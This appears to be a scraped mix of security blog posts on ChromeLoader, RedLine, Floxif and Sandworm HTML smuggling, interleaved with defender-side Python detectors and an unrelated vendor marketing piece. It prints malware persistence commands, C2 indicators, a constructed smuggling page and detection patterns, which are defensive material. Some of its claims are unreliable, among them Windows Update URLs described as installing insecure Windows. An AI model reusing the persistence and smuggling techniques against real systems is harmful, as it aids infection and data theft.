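            if re.fullmatch(r"[0-9a-fA-F]{32}", raw):  # 32 hex chars: MD5
                md5s.add(raw.lower())
            continue
        value = refang(raw)
        if "://" in value:
            urls.add(value)
            host = urlsplit(value).hostname
        else:
            host = value.split("/", 1)[0]
        if host and host.lower() not in SHARED_HOSTS:
            hosts.add(host.lower())
    return {"urls": urls, "hosts": hosts, "md5": md5s}


def match_proxy_log(log_text, iocs):
    """Return (ts, client, matched_on, value) for each log line that hits a
    full-URL indicator or, failing that, a host indicator."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, _status = line.split()
        host = (urlsplit(url).hostname or "").lower()
        if url in iocs["urls"]:
            hits.append((ts, client, "url", url))
        elif host in iocs["hosts"]:
            hits.append((ts, client, "host", host))
    return hits


def match_file_hashes(inventory_text, iocs):
    """Return (path, md5) for each inventory entry whose MD5 is an indicator."""
    hits = []
    for line in inventory_text.splitlines():
        if not line.strip():
            continue
        digest, path = line.split(maxsplit=1)
        if digest.lower() in iocs["md5"]:
            hits.append((path, digest.lower()))
    return hits


IOC_SET = build_indicator_set(DEFANGED_IOCS)

if __name__ == "__main__":
    for hit in match_proxy_log(SAMPLE_PROXY_LOG, IOC_SET):
        print("proxy hit:", *hit)
    for hit in match_file_hashes(SAMPLE_FILE_HASHES, IOC_SET):
        print("file hit:", *hit)
```

The holiday.png download is not reported even though it comes from a host that appears in the indicator list, while the Cube_WW6.exe download is, because the Discord URL is matched in full; the C2 rows without a scheme match on host, so the POST to 212.193.30.21 is caught regardless of path.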


When you look up a malicious document sample on MalwareBazaar, like this sample, you can see analysis data from olevba and oledump.

G2 has released their Fall 2022 reports, ranking Malwarebytes as the leader across a number of endpoint protection categories. 

Based on factual customer reviews, Malwarebytes has been ranked #1 over top EDR vendors for endpoint malware and antivirus protection, detection and remediation of web-based threats, product usability, and more. These results continue Malwarebytes’ top ranking by G2, reinforcing Malwarebytes leadership in the endpoint security platform market. 

Summary Report

Malwarebytes has ranked #1 for 4 reports OVERALL across all vendors and market segments

Grid

Results Index

Implementation Index

Usability Index

Malwarebytes has ranked #1 for 5 Mid-Market reports

Results Index

Relationship Index

Grid report (main report)

Implementation Index

Usability Index

Malwarebytes has ranked #1 for 1 Small Business reports

Grid report (main report)

Most rapid time to value (TTV)

Small- to medium-sized business (SMB) security teams need a solution that is quick to deploy, easy to set-up, and uncomplicated. Malwarebytes is that solution.

Ranked #1 in G2 Crowd’s Fall 2022 Implementation Index report, Malwarebytes’ endpoint protection suite provides the most rapid time to value (TTV) of all competitive solutions in the market today.

Best ROI

Looking for endpoint security that will provide maximum return on your investment? Malwarebytes is the answer. 

Ranked #1 in G2 Crowd’s Fall 2022 Results Index report, Malwarebytes provides the best estimated ROI of all endpoint protection suites based on our unique combination of rapid time to go live and time to ROI.


Malwarebytes ranked #1 for 4 reports OVERALL across all vendors and market segments
Grid® Report for Endpoint Protection Suites

Largest Market Presence and received the highest Satisfaction score among products in Endpoint Protection Suites. 98% of users rated it 4 or 5 stars.


Europe Regional Grid® Report for Endpoint Protection Suites

Market Presence and received the highest Satisfaction score among products in Endpoint Protection Suites. 98 percent of users rated it 4 or 5 stars.


Implementation Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of setup,” “Implementation time,” and “User adoption.”

Earned badge for highest implementation score.


Results Index

Contributing factors: Ratings for “Likely to recommend,” “Meets requirements,” and “Estimated ROI.”

Earned badge for highest overall Results score.

Usability Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of admin,” “Ease of use,” “Meets requirements.”

Earned badges for highest overall Usability score and highest ease of use rating. 


Malwarebytes ranked #1 for 5 Mid-Market reports

Badges are awarded to products that receive the highest overall ratings along certain categories. For example, the Highest Quality of Support badge goes to the product with the highest overall quality of support score.

Mid-Market Results Index for Endpoint Protection Suites

Contributing factors: Ratings for “Likely to recommend,” “Meets requirements,” and “Estimated ROI.”

Earned badges for highest overall Results score and highest likelihood to recommend score.

Mid-Market Relationship Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of business,” “Likely to recommend,” and “Quality of support.”

Earned badge for highest overall best relationship score.


Mid-Market Grid® Report for Endpoint Protection Suites

Malwarebytes has the largest Market Presence and received the highest Satisfaction score among products in Endpoint Protection Suites. 99 percent of users rated it 4 or 5 stars.


Mid-Market Implementation Index for Endpoint Protection Suites

Rated for “Ease of setup,” “Implementation time,” and “User adoption.”

Mid-Market Usability Index for Endpoint Protection Suites

Contributing factors: Ratings for “Ease of admin,” “Ease of use,” “Meets requirements.”

Earned badge for highest most implementable score.


Malwarebytes ranked #1 for 1 Small Business report
Small-Business Grid® Report for Endpoint Protection Suites

Malwarebytes has the largest Market Presence and received the highest satisfaction score among products in Endpoint Protection Suites. 98 percent of users rated it 4 or 5 stars.


Easy, effective, and efficient cyber protection validated by real users

Malwarebytes is committed to delivering a stellar experience for our users.

Customer reviews are critical to ensuring that endpoint security solutions perform well where it counts, whether that’s ease-of-use, implementation, or overall satisfaction. To read more about what customers have to say about Malwarebytes Endpoint Protection and EDR, check out our case studies page.

More resources

Malwarebytes receives highest rankings in recent third-party tests

Why MRG-Effitas matters to SMBs

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Why MITRE matters to SMBs

Recently, a vulnerability has been disclosed by Vectra that affects Microsoft Teams[1], the very popular communication tool used daily by millions of people (me too). Security researchers found that Teams stores session tokens in clear text on the file system. I won’t discuss the vulnerability here; read the blog post if you want to learn more. The critical element is that once the token has been stolen, an attacker can impersonate the user.

At the end of the blog post, Vectra lists interesting files to watch on the file system. For the Windows operating system, there are:

%AppData%\Microsoft\Teams\Cookies
%AppData%\Microsoft\Teams\Local Storage\leveldb

After reading this, I was curious to see if this is already exploited in the wild. I created a new hunting rule on VT and crossed my fingers. After a few false positives, I got a hit! A DLL was uploaded and contained one of the two strings above.

The file was called “RwWork.dll” (SHA256:5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b). It currently has a VT score of 56/71[2]. The file looks indeed for Teams cookies but even more:

As you can see, many files related to cookies are searched. The malware is from the Floxif family…

[1] https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
[2] https://www.virustotal.com/gui/file/5092a18330debda930a73835c8e77c6a7fb3a5904bdc04aad61c6c4136f0d24b/details

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

On September 20, 2022, the official Twitter account for 2K Support tweeted an important message from the Customer Support team.

The tweet said an unauthorized party illegally accessed the credentials of one of the vendors of the helpdesk platform. The attacker then used that access to send out communications that contained a malicious link.

The email

There is some confusion about the email, which is clear from reading the replies and tweets on 2K support. From what we managed to put together based on the tweets and what little information 2K provided, the first email looked similar to this one:

2K Support request

In some cases, these were followed by a second email that looked similar to this one.

Email with a direct link to the malware

At the point of writing, clicking the link in the first mail will take you to a login screen for the 2K games support site and the link in the second email takes you to a Zendesk page which tells you that this “help center” no longer exists.

The malware

In the case of the first email, visitors were taken to a support ticket that contained a link to the same file (2K+Launcher.zip). In the case of the second email, the email itself contained a direct link to the malware.

The zip file contains an executable called 2K Launcher.exe. It does display a 2K logo, but if you look at the Properties, you will notice the original filename is Plumy.exe. Both the Description and the Product name have it listed as 5K Player.

File properties of 2K Launcher.exe

The malware turns out to be RedLine infostealer. RedLine specializes in stealing banking information from a system’s clipboard. It also attempts to steal other data from the affected system, like browser history, cookies, and saved browser passwords.

Info stealers like this are usually delivered to an affected system when users download them under false pretenses, often disguised as popular software or cracks.

Supply chain

Breaking into the supply chain like this can give an attacker access to a large amount of potential victims. Most of the customers in this case had open tickets, so they weren’t surprised to receive an email from the Support desk. And it’s not uncommon for Support desks to send out files for system analysis, which can help support to pinpoint the problems customers might have with the installation of their product or any other hardware or software conflicts.

Mitigation

Anyone that has downloaded the file must now do a full system scan to remove any malware.

If you have executed the file, this means that information from and about your system may have been sent to the attacker.

What can you do to limit the dangers of stolen information as much as possible?

Change the passwords that might have been stolen for every website you can remember logging into. Depending on how your browser stores passwords, you may have to do the same for every password the browser remembers for you. All modern web browsers come with a built-in password manager that offers to store your login credentials, but how securely they encrypt those credentials differs greatly.
If your email account has been compromised, change that password first as other credentials may be sent to you by mail and still end up in the wrong hands. Some online shops even send you a password in plain-text.
Keep a close eye on your banking and eMoney accounts. Use the activity alerts that some banks offer.
Keep tabs on your posts in social media. It may look silly to check what you have supposedly posted yourself, but imagine someone else doing it for you.

Extra precautions

Enable 2FA wherever possible.
Do not re-use passwords, and consider a password manager to generate and remember all your passwords for you.

Malwarebytes customers were protected against this attack because the Premium version blocked the C2 server that the 2K Launcher.exe contacts when it is executed.

Malwarebytes blocks the connection to the C2 server (103.195.100.184)


Users are advised to patch immediately: We found exploit samples abusing the Atlassian Confluence vulnerability (CVE-2022-26134) in the wild for malicious cryptocurrency mining.

Originally published by CrowdStrike here. Written by Ioan Iacob and Iulian Madalin Ionita, CrowdStrike. This blog post is the first in a four-part series in which an Endpoint Protection Content Research Team will dive into various wipers discovered by the security community over the past 10 years. The goal is to review in depth the various techniques employed by wipers that target the Windows operating system.

Background

A wiper is a type of malware with a single purpose: to erase user data bey…

Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware.

Multiple security firms have reported that the Sandworm APT continues to target Ukraine with multiple means, including custom malware and botnet like Cyclops Blink.

Sandworm (aka BlackEnergy and TeleBots) has been active since 2000; it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).

The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions worth of damage.

In April, Sandworm targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper.

The APT hacking group is believed to have been behind numerous attacks this year, including an attack on Ukrainian energy infrastructure and the deployment of a persistent botnet called “Cyclops Blink” dismantled by the US government in April.

From August 2022, Recorded Future researchers observed a rise in command and control (C2) infrastructure used by Sandworm (tracked by Ukraine’s CERT-UA as UAC-0113).

The researchers observed C2 infrastructure relying on dynamic DNS domains masquerading as Ukrainian telecommunication service providers.

State-sponsored hackers used their infrastructure to deliver multiple malicious payloads via an HTML smuggling technique, including Colibri Loader and Warzone RAT.

“A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113’s broadening but continuing use of publicly available commodity malware,” reads the report published by Recorded Future.

While analyzing the C2 infrastructure Recorded Future discovered that the domain datagroup[.]ddns[.]net reported in CERT-UA’s June report on UAC-0113 was likely masquerading as the Ukrainian telecommunications company Datagroup. The domain resolved to the IP address 31[.]7[.]58[.]82, which was used to host the domain kyiv-star[.]ddns[.]net impersonating another Ukrainian telecommunications company Kyivstar.

Between July and August, the researchers noticed the use of the “ett[.]ddns[.]net” and “ett[.]hopto[.]org” domains likely used to impersonate the LLC Ukrainian telecom operator EuroTransTelecom.

The attack chain starts with spear-phishing messages, pretending to come from a Ukrainian telecommunication provider, sent to the victims in an attempt to trick them into visiting the malicious domains.

The messages are written in Ukrainian and the topics used in the attacks relate to military operations, reports, etc.

Experts noticed the presence of the same web page on multiple domains, it displays the text “ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ” which translates as “Odesa Regional Military Administration”, along with “File is downloaded automatically” in English.


The HTML of the webpage contains a base64-encoded ISO file that is automatically downloaded when the website is visited; this is the HTML smuggling technique. HTML smuggling is a highly evasive malware-delivery technique that leverages legitimate HTML5 and JavaScript features: the malicious payload is delivered as an encoded string in an HTML attachment or webpage, and the malicious content is assembled within the browser on the target device, which is already inside the security perimeter of the victim’s network.
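A defender-side check for pages of this kind, as an added example that is not from the Recorded Future report or CERT-UA: it looks for the browser-side primitives that rebuild a file (atob, Blob, a clicked download link) together with a long base64 run, decodes the run and names the payload by magic bytes. The lure page it runs on is constructed for the example; only the quoted lure text is reused.

```python
"""Detector for HTML smuggling pages of the kind described above.

Added example (not from Recorded Future or CERT-UA). It flags an HTML document
when it both contains the browser-side primitives used to rebuild a file
(atob, Blob, a download link that is clicked) and carries a long base64 run
that decodes to a recognisable container or executable. The lure page it is
run on is constructed for this example.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Browser-side primitives typically combined to materialise a smuggled file.
JS_MARKERS = [
    r"\batob\s*\(",
    r"new\s+Blob\s*\(",
    r"URL\.createObjectURL\s*\(",
    r"msSaveOrOpenBlob",
    r"\.download\s*=",
    r"\.click\s*\(\s*\)",
]
# Long enough to be a file rather than an inline icon, font or tracking pixel.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{512,}={0,2}")


def fingerprint(data: bytes) -> Optional[str]:
    """Name the payload type from magic bytes, or None if unrecognised."""
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "iso9660"  # primary volume descriptor sits at sector 16
    if data[:4] == b"PK\x03\x04":
        return "zip"
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"Rar!":
        return "rar"
    return None


def analyse_html(html: str) -> Dict:
    """Return matched JS markers, decoded payload summaries and a smuggling verdict."""
    markers = [m for m in JS_MARKERS if re.search(m, html)]
    payloads: List[Dict] = []
    for match in BASE64_RUN.finditer(html):
        blob = match.group(0)
        try:
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all
        payloads.append({"encoded_len": len(blob),
                         "decoded_len": len(decoded),
                         "type": fingerprint(decoded)})
    # Verdict: reconstruction code present AND an embedded file we can name.
    smuggling = len(markers) >= 2 and any(p["type"] for p in payloads)
    return {"js_markers": markers, "payloads": payloads, "smuggling": smuggling}


def fake_iso() -> bytes:
    """Constructed ISO 9660 skeleton: 16 blank sectors then a volume descriptor."""
    img = bytearray(0x8000)                       # sectors 0-15 (system area)
    img += b"\x01CD001\x01\x00" + b"\x00" * 2040  # descriptor sector 16
    return bytes(img)


def sample_page() -> str:
    """Constructed lure: the text quoted in the article plus a decode-and-save script."""
    payload = base64.b64encode(fake_iso()).decode()
    return f"""<html><body>
<h1>ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ</h1>
<p>File is downloaded automatically</p>
<script>
var d = atob("{payload}");
var blob = new Blob([d]);
var a = document.createElement("a");
a.download = "file.iso";
a.click();
</script></body></html>"""


if __name__ == "__main__":
    result = analyse_html(sample_page())
    print(result["smuggling"], result["js_markers"], result["payloads"])
```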

The researchers published a report that includes details about the malware and the C2 infrastructure.

The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.

xonasystems.com – Troubling new malware designed to facilitate attacks on a wide array of critical infrastructure – from oil refineries and power plants to water utilities and factories – is raising concerns about its…

Tweeted by @fogoros https://twitter.com/fogoros/status/1569740242101456896


FortiGuard Labs discovered an Excel document with an embedded file name that is randomized, which exploits CVE-2017-11882 to deliver and execute malware on a victim’s device. Read our blog to learn what malware families it can download and what malicious actions it can conduct.

Executive Summary

Chromeloader proves to be an extremely prevalent and persistent malware.  It initially drops as an .iso and can be used to leak users’ browser credentials, harvest recent online activity and hijack the browser searches to display ads.  The VMware Carbon Black Managed Detection and Response (MDR) team observed the first Windows variants of Chromeloader in the wild in January 2022 and the macOS version in March 2022.

There are some variants known to ChromeLoader, including ChromeBack and Choziosi Loader.  Unit 42 researchers have found evidence of the real first Windows variant using the AHK (AutoHotkey) tool to compile a malicious executable and drop version 1.0 of the malware.

Although this sort of malware is created with an intent to feed adware to the user, Chromeloader also increases the attack surface of an infected system.  This can eventually lead to much more devastating attacks such as ransomware.  In this article, the VMware Carbon Black MDR team will show evidence of such attacks happening.

History

At the beginning of January 2022, the malware CS_installer was seen in the wild targeting Chrome browsers. CS_installer used ISO image file downloads and relied on user execution to initiate infection. The malware ultimately aimed to install a Chrome extension that acted as a browser hijacker, gathering personal information and tracking the user’s browsing activity.  CS_installer was also known as ChromeLoader as that was one of the names of the scheduled task the malware created. CS_Installer used a .NET executable by the same name to kick off the infection chain and install the malicious chrome extension.

CS_Installer activity died down for a bit and soon after a similar malware emerged. While this was also delivered via ISO files, there were differences in execution. This recent malware relies on a batch script in the mounted drive to install the second stage payload also delivered within the same ISO and start infection. This payload which would be the main malware file moving forward has varying names, some of the most common ones are mentioned below.

While the initial infection techniques and the contents of these two malware types are different, the objective is the same: to gather user data and track browsing activity while feeding adware. The naming convention of the scheduled tasks used by both samples to gain persistence was also very similar to Chromeloader. In addition, the coincidental timing of this second malware emerging right after CS_Installer/ChromeLoader died down would lead us to hypothesize that they are the same malware, the second variant being an evolution of the first.

Other security professionals have alluded to the similarity and possible connection between these two malware. [Link to Palo Alto & Red Canary]  We will therefore also reference the second variant as ChromeLoader as we analyze the incidents MDR has responded to in this article.

ChromeLoader Delivery

In a ChromeLoader infection, malware authors offer pirated or cracked versions of games or software.  They typically distribute this software on social media platforms, through torrents, on pirating sites, or bundled with legitimate games and software.  When the victim installs this malicious file, they unknowingly download an ISO file that contains ChromeLoader and oftentimes other malware.  This Optical Disc Image file is unable to do any harm to the machine until the victim double-clicks on the ISO and runs the Install shortcut.  The user is likely to open this file, thinking it’s a legitimate game download.

Attack Chain

The disk image is mounted as a virtual CD-ROM disk, with contents similar to the graphic below:

Once the Install shortcut is double-clicked, resources.bat executes the command tar -xvf "app.zip" -C "C:\Users\UserName\AppData\Roaming", extracting the contents of app.zip into that directory.

An executable is then dropped onto the user’s device. In this case bloom.exe is the executable.

Other variants are listed below:

Cash.exe
Flbmusic.exe
Opensubtitles-uploader.exe
Diet.exe
Healthy.exe
Strength.exe
Shape.exe
Energy.exe
Bloom.exe
Tone.exe

Embedded within the bloom.exe binary is nw.exe, a component of NW.js.  NW.js lets developers write native applications in HTML and JavaScript and call Node.js modules directly from the Document Object Model (DOM).  Its name stands for Node-Webkit; it is built on Chromium and Node.js, which provide the application runtime that lets the executable make external network connections to malicious websites.

Instances of this malware also use scheduled tasks for persistence.  A list of task names used include:

$tsn = @("chrome window", "chrome panel", "chrome tab", "chrome view", "chrome cast", "chrome history", "chrome flags", "chrome bookmarks", "chrome conf", "chrome storage", "chrome tools", "chrome settings", "chrome support", "chrome tele")

The batch files in the dropped archive (resources.bat, configuration.bat, properties.bat) create a Run key to persist the malware.  They do this by unzipping various DLLs into the AppData\Roaming folder and adding registry keys as seen below:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Bloom /t REG_SZ /d "C:\Users\*\AppData\Roaming\Bloom\Bloom.exe --qyS7" /f

These dropped executable files were also seen attempting to harvest browser credentials.

The adware eventually executes a base64-encoded PowerShell script that creates and writes encoded text in the registry.  Some examples of the registry keys we’ve seen being created are:

HKCU:\Software\LogiShdr
HKCU:\Software\Martin Prikyrl
HKCU:\Software\SiberSystems
HKCU:\Software\aignes
HKCU:\Software\BinaryFortressSoftware
HKCU:\Software\AeroTechnologies
HKCU:\Software\LightScribe
HKCU:\Software\ZabaraKatranemiaPlc

The encoded script written to this location is executed at set intervals, making network connections to a rotating set of suspect .autos, .xyz and .com domains.

Soon after this PowerShell command is run, the malware attempts to load the Chrome extension chrome_zoom, as seen in the screenshot below:

We have also seen evidence of the executables (prime.exe, bloom.exe, etc.) then spawning outlook.exe to be used for data exfiltration, as seen in the example below.

Evolution Timeline

Tone.exe was first seen in the wild at the end of January 2022.  This was one of the first evolutions of ChromeLoader and is mentioned in an article from Palo Alto Networks Unit 42 as Variant 2.

Following the spread of Tone.exe the VMware Carbon Black MDR team saw bloom.exe make an appearance in customer environments, beginning March 2022.  The .iso file the user downloads contains the batch script, resources.bat, which unzips the file bloom.exe.  This executable is seen making external network connections and exfiltrating sensitive data.

Since the release of the Bloom variant there have been numerous new Chromeloader renditions that follow the same attack chain and use different process names and hashes to avoid detection.  Below is a chart showing the date each variant was first detected in our customers’ environments and some of the naming conventions that were used with each variant.

Notable Variants
Opensubtitles-uploader.exe

This variant drops properties.bat instead of the previously seen resources.bat.  In the ISO archive, there is an executable named opensubtitles-uploader.exe.  OpenSubtitles is a legitimate program that helps users find subtitles for popular movies and TV shows, however, in this case, the malware author is impersonating the software by using the same name.  This executable is used in conjunction with this adware program and redirects web traffic, steals credentials, and recommends other malicious downloads posed as legitimate updates.

Similar to previous variants, tar is used to unzip the archive files.zip to the AppData\Roaming directory, followed by properties.bat adding Run keys to the registry for persistence.  OpenSubtitles is also masquerading as the file nw.exe, which is used to run JavaScript and HTML programs.

The most recent ChromeLoader variants are commonly unknown and don’t appear malicious at a glance.  The VMware Carbon Black MDR team has become accustomed to identifying the new ChromeLoader IOCs and can stop the attack quickly.

Flbmusic.exe

This variant is typically dropped on Windows systems.  Its configurations.bat file unzips the folder named files.zip, which contains the executable flbmusic.exe and various other libraries and files.  Soon after, flbmusic.exe is added to the CurrentVersion\Run key for persistence, and the executable is then started.

FLB Music

Flbmusic.exe is a legitimate program for cross-platform music playing.  However, the malware author is impersonating this software.  This program contains electron.exe.pdb, which is a portable database used in debugging configurations for Electron.

Very similar to ChromeLoader’s previous versions using NW.js, Electron is a runtime that allows you to create desktop applications with HTML5, CSS, and JavaScript.  By embedding Chromium and Node.js into its binary, Electron allows attackers to load modules that let these applications listen on specified ports and communicate over the network.

Electron requires you to package your app before distributing it, and the package contains the application’s unprotected source code. This makes it possible for application X to extract application Y and inject vulnerable scripts without the victim knowing it.

Evidence of Attack Escalation and Module Loading

While thought to be just a credential stealing browser hijacker, ChromeLoader has been seen in its newest variants to be delivering more malicious malware and used for other nefarious purposes.

As recently as late August, ZipBombs have been seen being dropped onto infected systems.  The ZipBomb is dropped with the initial infection in the archive the user downloads.  The user must double-click for the ZipBomb to run. Once run, the malware destroys the user’s system by overloading it with data. The ZipBomb seen in ChromeLoader archives is the classic and sophisticated 42.zip, which is 42 kilobytes in size when compressed but over 40 petabytes when decompressed.  This file has been seen under the names vir.exe, very_fun_game.zip, passwords.zip, AzizGame (1).zip, nudes.zip, unreleased_songs.zip, FreeNitro.zip, jaws2018crack.zip.

Another malware included in the archive the user downloads is Enigma Ransomware.  This attack has also been seen as recently as late August 2022.  It is distributed in HTML attachments found in the archive.  When the attachment is opened, it will launch the default browser, execute its embedded JavaScript, and then follow its standard chain.  Names that have been seen in this attack include REG-archive.zip and KeyFILE-Generator_protected.exe.  The malware will typically drop its ransom note as readme.txt.

Another part of the infection seen is that in some cases, the attacker uses their installation servers to download and install unsecured versions of Windows.  The URLs seen include:

hXXp://ctldl[.]windowsupdate[.]com/msdownload/update/v3/static/trustedr/en/disallowedcertstl[.]cab
hXXp://ctldl[.]windowsupdate[.]com/msdownload/update/v3/static/trustedr/en/authrootstl[.]cab

More information on this can be found at Microsoft’s website.

Another software seen in the .bat downloaded by the user is Utorrent.  It is often named after cracks, movies, video games, or wallpapers.

Some names seen include:

wild.eight.v0.6.19.multi.8.cracked3dm.torrent
need for speed rivals crack v3 updated december zip
mechanic.simulator.2018.update.v1.0.4bat.torrent
Vector magic desktop edition 1.15 product key
Need for speed most wanted (2005 video game) download
evangile.w.happiness.steam.edition.rar
creed.originsfull.unlocked.part03.rar

While Utorrent itself is just a BitTorrent client for Windows, it often comes bundled with other malware that the user chooses to accept to install when asked if they accept the EULA.  Utorrent will also install the unsecured versions of Windows that have been mentioned previously.

Carbon Black Detection

Our skilled MDR analysts continuously hunt for prevalent and active threats in our customers’ environments.  Thus far we have found 50+ infected organizations that use our services.  VMware Carbon Black products prove to be very reliable when detecting and alerting on malicious behavior generated by ChromeLoader; our sensors pick up behaviors that many other security vendors can’t.

Since the behaviors and tactics of this malware change so frequently, most current IOCs, such as file hashes and C2 IPs, become unreliable indicators of infection.  Our MDR analysts are highly trained to pick out malicious behavior.  Using data generated from recent attacks seen in other organizations, the team is able to quickly confirm malicious behaviors and contain the threat.  MDR continues to prove that human expertise is extremely valuable for containing threats and responding in a timely manner.

Summary

It’s no surprise that this pesky adware has been one of our most frequent attacks.  This campaign has gone through many changes over the past few months, and we don’t expect it to stop.

The VMware Carbon Black MDR team is highly efficient at detecting this threat and has found that, of the 50+ affected customers, the majority of the infected are in the business services industry, followed by government.

In the picture above we have broken down the attack prevalence across industries and how each industry is impacted by the different executables of ChromeLoader. The majority of cases we are seeing are linked to Bloom.exe, followed by Energy.exe. It is imperative that these industries take note of the prevalence of this attack and prepare to respond to it, because as seen above ChromeLoader can lead to nastier infections.

As we’ve seen in previous Chromeloader infections, this campaign widely leverages powershell.exe and is likely to lead to more sophisticated attacks.  The Carbon Black MDR team believes this is an emerging threat that needs to be tracked and taken seriously due to its potential for delivering more nefarious malware.  It has been seen before that adware is waved off as just being a nuisance malware, however because of this, malware authors are able to take advantage and use it for wider attacks like Enigma ransomware.

It’s important to track all threats in an environment.  VMware’s Carbon Black MDR team makes this possible by tracking and responding to the threats for you and your environment.

The post The Evolution of the Chromeloader Malware appeared first on VMware Security Blog.


In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others take notice and switch to using it for other things.

Initial infection

The user went to the malicious search results, where the query they searched for presented an ISO file for their search terms. Below are the results for a user that got infected:

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

C:\Users\user\Downloads\Stroud - Advanced Engineering Mathematics 4e.iso

This ISO file contained the following files:

files.zip
res.ico
Install.lnk
properties.bat

The user double-clicked on the properties.bat file, which started the infection process.

Parent Process Name: cmd.exe

Parent Process Command Line: cmd.exe /c ""D:\properties.bat" "

Process Name: tar.exe

Process Command Line arguments: tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"

They established persistence with a CurrentVersion\Run key:

"opensubtitles-uploader.exe "k2eN"" /f

HKEY_CURRENT_USER\S-1-5-21-740110469-27406-3214746-20027\SOFTWARE\Microsoft\Windows\CurrentVersion

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe

Connections to some malicious domains were made from opensubtitles-uploader.exe:

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe

https://alizebruisiacult[.]xyz

https://raw.githubusercontent[.]com
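The process listing above and the Carbon Black attack-chain description earlier (tar.exe unpacking into AppData\Roaming from a .bat on the mounted ISO, the reg add Run-key line, the $tsn scheduled-task names, encoded PowerShell) share one detection pattern, so one added example covers both. It is not code from either write-up; the event fields and sample events are constructed, with the first two command lines reused from those quoted in the articles.

```python
"""Behavioural detection for the ChromeLoader infection chain.

Added example (not Carbon Black or ISC code). Each ProcessEvent carries the
fields a Sysmon/EDR process-creation record would: image, command line and
the parent's image and command line. Field names and sample events are this
example's own; the first two command lines reuse those quoted in the articles.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Scheduled-task names from the $tsn array quoted in the Carbon Black post.
CHROME_TASK_NAMES = {
    "chrome window", "chrome panel", "chrome tab", "chrome view", "chrome cast",
    "chrome history", "chrome flags", "chrome bookmarks", "chrome conf",
    "chrome storage", "chrome tools", "chrome settings", "chrome support",
    "chrome tele",
}
ROAMING = re.compile(r"\\AppData\\Roaming(\\|\b)", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
# A .bat launched from a drive other than C: (a mounted ISO appears as D:, E:, ...).
BAT_FROM_OTHER_DRIVE = re.compile(r'\b([D-Z]):\\[^"]*\.bat\b', re.I)
TASK_NAME = re.compile(r'/tn\s+(?:"([^"]+)"|(\S+))', re.I)
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)


@dataclass
class ProcessEvent:
    image: str
    cmdline: str
    parent_image: str = ""
    parent_cmdline: str = ""


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def detect(ev: ProcessEvent) -> List[str]:
    """Return the ChromeLoader behaviours an event matches (empty list if none)."""
    findings: List[str] = []
    img, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.cmdline

    # Stage 1: tar.exe extracting into AppData\Roaming. A cmd.exe parent running a
    # .bat from a non-system drive is the mounted-ISO pattern from both write-ups.
    if img == "tar.exe" and re.search(r"\s-x", cmd) and ROAMING.search(cmd):
        if parent == "cmd.exe" and BAT_FROM_OTHER_DRIVE.search(ev.parent_cmdline):
            findings.append("tar_extract_from_mounted_bat")
        else:
            findings.append("tar_extract_to_roaming")

    # Stage 2: Run-key persistence whose value points under AppData\Roaming.
    if (img == "reg.exe" and re.search(r"\badd\b", cmd, re.I)
            and RUN_KEY.search(cmd) and ROAMING.search(cmd)):
        findings.append("run_key_to_roaming")

    # Scheduled task created with one of the known "chrome ..." names.
    if img == "schtasks.exe":
        m = TASK_NAME.search(cmd)
        name = (m.group(1) or m.group(2)) if m else ""
        if name.strip().lower() in CHROME_TASK_NAMES:
            findings.append("chrome_named_task")

    # Encoded PowerShell, used in the chain to stage the registry-resident script.
    if img in ("powershell.exe", "pwsh.exe") and ENCODED_PS.search(cmd):
        findings.append("encoded_powershell")
    return findings


def triage(events: List[ProcessEvent]) -> Dict[str, List[str]]:
    """Map each event's command line to its findings, dropping events with none."""
    out: Dict[str, List[str]] = {}
    for ev in events:
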